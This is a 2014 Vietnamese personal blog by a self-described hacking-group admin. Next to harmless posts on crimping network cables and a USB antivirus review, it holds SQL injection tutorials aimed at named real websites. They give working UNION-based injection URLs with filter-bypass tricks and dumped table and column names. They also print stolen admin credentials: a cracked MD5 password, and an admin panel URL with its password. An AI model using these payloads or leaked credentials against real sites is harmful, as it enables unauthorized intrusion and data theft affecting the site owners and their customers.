Hacking - Security

Welcome to Mr Quý's Blog

Software

Nơi lữu trữ những phần mềm hữu ích cho cuộc sống

Tin Tức 24h

Nơi thường xuyên cập nhật những tin tức nóng trong và ngoài nước

Thiết Kế Đồ Họa

Nơi trưng bày những tác phẩm và bài học từ thiết kế đồ họa

Hacking SQLi

Lỗ hổng bảo mật SQLi của những trang web trong và ngoài nước

Thứ Ba, 4 tháng 11, 2014

Cách bấm cáp mạng (Cáp RJ45) (Bấm thẳng + Bấm chéo)

1. Các kiểu bấm cáp và khi nào dùng kiểu này

Đối với cáp RJ45 thì có 2 kiểu bấm là :
Bấm thẳng + Bấm chéo.

Bấm thẳng: Kiểu này dùng để nối 2 thiết bị khác loại lại với nhau. VD: PC + Switch, Switch + Router ....
Lý do: Đầu nhận của bên này là đầu gửi của bên kia rồi nên bấm thẳng sẽ dùng nối 2 thiết bị khác loại

Bấm chéo: Kiểu này dùng để nối 2 thiết bị cùng loại lại với nhau. VD: PC-PC, PC-Router ...

Lý do: Đầu nhận của bên này là đầu nhận của bên kia luôn nên phải đảo chéo lại để nó có thể gửi nhận đúng.

Để cho rõ, thì các bạn có thể tham khảo danh sách các thiết bị cùng loại dưới đây

+ Hub, Repeater là cùng 1 loại.
+ Bridge, Switch là cùng 1 loại.
+ Router, PC là cùng 1 loại.

Như vậy, Router nối PC là cùng loại nên phải bấm chéo, PC nối PC cùng loại nên phải bấm chéo ....

2. Các dụng cụ cần thiết
+ Kìm bấm cáp
+ Kéo cắt vỏ (Có thể ko cần vì trên kìm cũng có rồi nhưng lúc mua kìm có cho kèm cái này)
+ 2 đầu cáp
+ 1 dây cáp

3. Cách bấm thẳng
+ Các bạn dùng kìm hoặc kéo cắt vỏ đầu cáp (Cứ cắt dài 1 xíu, tý xếp màu cho dễ)




Sau khi cắt ra, các bạn gỡ các đầu xoắn và xếp theo thứ tự:
Cam - Xanh da trời - Xanh lá - Nâu.
Lưu ý: Màu trắng xếp trước như hình dưới






Đổi chỗ màu trắng của xanh lá cây và màu trắng của xanh da trời ta được như hình dưới




Xếp các dây lại sát nhau và dùng kìm cắt cho bằng lại với độ dài còn lại vừa phải



Dút dây vào đầu cáp.
Lưu ý: Đút vào thật sâu để các đầu dây chạm lõi đồng nhé. Nếu bạn căn chuẩn thì vỏ dây sẽ vừa đi qua nấc bấm, Sau khi bấm xong đầu cáp sẽ chắc chắn hơn.



Cuối cùng nhét vào kìm và bấm mạnh 1 cái (Bấm dứt khoát nhé )




Đầu dây còn lại bạn bấm y chang như vừa rồi là xong





4. Cách bấm chéo
1 đầu bạn bấm như bấm thẳng bên trên, đâu còn lại bạn bấm theo hướng dẫn bên dưới


Cắt vỏ cáp và xếp dây như hình dưới (Các bạn chọn cách nhớ thế nào cho dễ thì tùy )




Xếp sát lại và cắt cho bằng lại. Chừa lại 1 đoạn vừa đủ như hình dưới




Nhét vào đầu cáp và bấm lại bằng kìm là xong
Nguồn: sinhvienit.net

Thứ Ba, 21 tháng 10, 2014

Thông Tin Về Tôi

Họ & Tên: Huỳnh Ngọc Quý
Lớp: 14KTHD1
Trường: Trung Cấp Nghề Kỹ Thuật Công Nghệ Hùng Vương
Sở thích: Nge nhạc thư giản một mình
Lĩnh vực đang tham gia: Hacking - Security, chuyên về SQL injection

Tôi bắt đầu tham gia vào Thế Giới Hacking vào cuối tháng 9 năm 2013 và cho đến nay, tôi đã từng tham gia nhiều các diễn đàn Hacker như http://ceh.vn/ , http://hvaonline.com/ , http://mumauden.org/ và đây là trang blog Hacking của tôi http://quyhuynhsqli.blogspot.com/ , mục đích của đam mê là muốn tìm hiểu về hệ thống bảo mật của Webmaster và các cuộc tấn công mạng của các Hacker qua nhiều phương thức chuyên nghiệp.
Đam mê không bao giờ là giới giạn - Hãy đam mê theo cách của bạn

Thứ Năm, 9 tháng 10, 2014

USB Disk Security 6: ‘Khắc tinh’ của virus USB

Các tính năng mới trong USB Disk Security 6.0.0.126:
- Tính năng Safe Open cho phép bạn xem nội dung các file trên USB ở chế độ an toàn.
- Tạo “khóa chống ghi” dữ liệu trên USB.
            - Vô hiệu cổng USB trên máy tính.
Download tại Đây
Giao diện USB Disk Security 6.0 được “tút” lại theo phong cách hoàn toàn mới với tông màu xanh, các nút nhấn được bố trí phía trái trông khá gọn gàng. Biểu tượng dưới khay hệ thống cho biết USB Disk Security đang chạy nền và sẵn sàng “tóm gọn” những virus có trên USB khi cắm vào máy tính. 
1. Khi cắm USB vào máy, chương trình sẽ tự động dò tìm virus và thông báo cho bạn biết thông qua thẻ USB Shield. Bạn nhấn Delete All để tiêu diệt các mối nguy hiểm được tìm thấy.
Ngoài ra, bạn có thể nhấn nút Safe Open phía dưới để truy cập dữ liệu trên USB ở chế độ an toàn. Ở chế độ này, mọi virus đang ẩn nấp trên USB sẽ không có cơ hội “ra tay” phá hoại hệ thống.
2. Để quét virus trên toàn USB, bạn chọn thẻ USB Scan phía trái rồi nhấn Scan. Quét xong, bạn nhấn Delete All để diệt virus (nếu có).
Tính năng USB Vaccine trong thẻ USB Scan giúp bạn tạo thêm “lá chắn” cho máy tính lẫn USB. Khi ấy, mọi virus có trên máy tính sẽ không thể xâm nhập vào USB, và ngược lại. Ở hộp thoại USB Vaccine, bạn lần lượt nhấn Vaccinate ComputerVaccinate USB để bảo vệ máy tính lẫn USB.
3. Ngoài khả năng dò tìm và phòng chống virus lây lan qua cổng USB, thẻ Data Protection gồm hai tính năng USB Access Control (tạo “khóa chống ghi” cho USB) và USB Drive Control (vô hiệu cổng USB trên máy tính). Nếu muốn kích hoạt tính năng nào, bạn nhấn Lock tại tính năng đó (nên rút USB ra khỏi máy tính trước khi thực hiện).
Khi thấy hộp thoại Password Settings hiện ra, bạn nhập mật khẩu bảo vệ vào ô New passwordConfirm password rồi nhấn OK.
Nếu kích hoạt tính năng USB Access Control, bạn không thể sao chép dữ liệu từ máy tính sang USB, nhưng vẫn có thể sao chép dữ liệu từ USB sang máy tính.
Khi muốn vô hiệu một trong hai tính năng, bạn chọn thẻ Data Protection rồi nhấn nút Unlock. Sau đó, bạn nhập mật khẩu bảo vệ đã thiết lập ban đầu vào ô Password, nhấn OK và rút USB ra khỏi máy tính.
4. Thẻ System Tools gồm ba công cụ cho hệ thống: Disk Cleanup (xóa cache trình duyệt, dọn sạch thùng rác), Repair System (khắc phục các lỗi hệ thống do virus gây ra), Autostart List (xem các đối tượng khởi động cùng Windows).




Thứ Sáu, 26 tháng 9, 2014

Hướng dẫn SQLi bài cơ bản

SQLi cơ bản
Victim: http://noithatgiathanh.com.vn/

Get order by bình thường chắc các bạn cũng biết query rồi
Order by ...--+-

Sau khi ra được phần Order by ta Union Select nó để get version
Get version: Version()

Get Table:
http://noithatgiathanh.com.vn/?frame=product_detail&id=-738 UNION all /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000table_name*/))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--+-

Đây là trường hơp khi mình query theo cách bình thường nhưng ko thấy hiện ra các table, ta phải dùng bypass là unhex(hex( để tiến hành làm xuất dữ liệu của table ra
"tbl_access,tbl_config,tbl_content,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_product_category,tbl_product_home,tbl_product_pro,tbl_product_sell,tbl_product_special,tbl_user,tbl_visitor"

Get Column:
Tương tự như query table_name ta chỉ việc thay table_name trong group_concat thành column_name

http://noithatgiathanh.com.vn/?frame=product_detail&id=-738 UNION all /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!column_name*/))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_schema=database()--+-

"id,date,id,code,name,detail,date_added,last_modified,id,code,name,parent,subject,detail_short,detail,image,image_large,sort,status,date_added,last_modified,lang,id,code,name,parent,subject,detail_short,detail,image,image_large,sort,status,date_added,last_modified,lang,id,name,sex,company,address,city,country,tel,fax,email,website,uid,pwd,status,date_added,last_modified,note,code,orderid,id,code,member_id,date_added,last_modified,id,order_id,product_id,quantity,price,status,id,code,name,parent,subject,detail_short,detail,image,image_large,sort,status,status1,pro_new,pro_sell,checksao,date_added,last_modified,lang,price,luotxem,id,code,name,parent,subject,detail_short,detail,image,image_large,sort,status,date_added,last_modified,lang,id,product_id,price,sort,status,date_added,last_modified,lang,id,product_id,sort,status,date_added,last_modified,lang,id,product_id,sort,status,date_added,last_modified,lang,id,product_id,sort,status,date_added,last_modified,lang,id,uid,pwd,session_id,activity,member,ip_address,url"

Ta chỉ lưu ý đến column có thể chứ tài khoản login của ADMIN thôi
=> "uid, pwd"

Get tài khoản:
http://noithatgiathanh.com.vn/?frame=product_detail&id=-738 UNION all /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!uid,0x7c,pwd*/))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tbl_user--+-

=>"admin|975e89cd02486d78cc50bb06678a5969"
ID: admin
pass: 975e89cd02486d78cc50bb06678a5969
MD5: ceh

Tutorials By Quý Huỳnh, Admin VN-Hacking Group

Hướng dẫn check site chặn ký tự và query


Victim: http://www.alatkesehatan.co.id

Lưu ý: site này bị cắn query "concat" và chặn luôn dấu "( )" nhé.

Ta tìm version:
http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,2,3,4;&nm=doctor_equipment

ra được số "2" thay version vào

http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,@@version,3,4;&nm=doctor_equipment

=>  5.5.34-log

Get Table:

http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,/*!10000table_name,3,4 from /*!10000information_schema*/.tables where table_schema=database() limit 0,1;&nm=doctor_equipment

Ta tăng "Limit" lên dần dần để tìm từ khóa khả nghi
=> Limit 0,1 = tbl_config
Theo thứ tự 1,1 rồi 2,1...

Get Column:

http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,/*!10000column_name,3,4 from /*!10000information_schema*/.columns where table_name=0x74626c5f75736572 limit 0,1;&nm=doctor_equipment

Khai thác y chang như get table nhé. Cứ tăng dần Limit.
----------------------------

Link Admin: http://www.alatkesehatan.co.id/myadmin
User ID: admin
Password: A789000EE==
-------------------------------
Lưu ý đây là site mẫu tôi đã check qua rồi và đã hướng dẫn nhiều rồi nên các bạn chỉ xem đây là một bài học kinh nghiệm

--- Checked By Quý Huỳnh, Admin VN - Hacking Group ---

Thứ Năm, 25 tháng 9, 2014

Check Site SQL Trường Cao Đẳng Y Tế Cần Thơ

Check Site SQL Cao Đẳng Y Tế Cần Thơ

Bypass chặn: () , -- -, group_concat, concat_ws, chặn dấu =
=> Thay thế dấu "=" thành chữ "Like"
=> Thay thế khoảng trống và phía sau: %0A, /**/, --
Download TUT tại Đây
Pass giải nén:
quyhuynhsql
Khi share nhớ để lại nguồn.

Bài viết và Tut rất rõ ràng, bạn nào chưa hiểu có thể pm hỏi mình qua FB của mình có sẵn trên nút FB của blog




Quý Huỳnh - Admin VN - Hacking Group

Ý Nghĩa Các Ký Tự Trong SQLi

Mình sẽ trình bày cho các bạn Newbie về các dấu ký tự khi đặt vào tham số (dork) hoặc dòng lệnh (Query):
+ Dấu nháy đơn ( ' ): Dấu nháy này thường các bạn đặt nó đằng sau tham số mà các bạn tìm được, vd: "php?id=1' " .Dấu này trong ngôn ngữ SQL dùng để “gói” chuỗi. Chúng ta thường hay thêm nó vào sau tham số (dork) để kiểm tra có lỗi hay không.

+ Dấu gạch ngang ( - ): Cũng giống như trên nhưng nó đặt trước kiểu số tham số
vd: "php?id=-1"
Lưu ý: 2 dâu trên chúng ta phải tùy biến, ko phải lúc nào đặt dấu nháy là nó lỗi hoặc dấu gạch ngang là ra lỗi, có đôi khi phải dùng cả 2 ^^.

+ Dấu chấm phẩy ( ; ): Dùng để kết thúc một chuỗi truy vấn và sau nó là bắt đầu một chuỗi truy vấn khác. Có thể dùng dấu cộng ( + ).

+ Dấu thăng (#), dấu 2 gạch liền kề (--), dấu (/*), dấu ( ; ): Những dấu này để đánh dấu chú thích hết chuỗi truy vấn, nghĩa là những kí tự đứng sau một trong những dấu này trên cùng một dòng truy vấn sẽ được xem là chú thích được bỏ qua khi thực hiện truy vấn
order by 10# 
order by 10-- 
order by 10/* 
order by 10;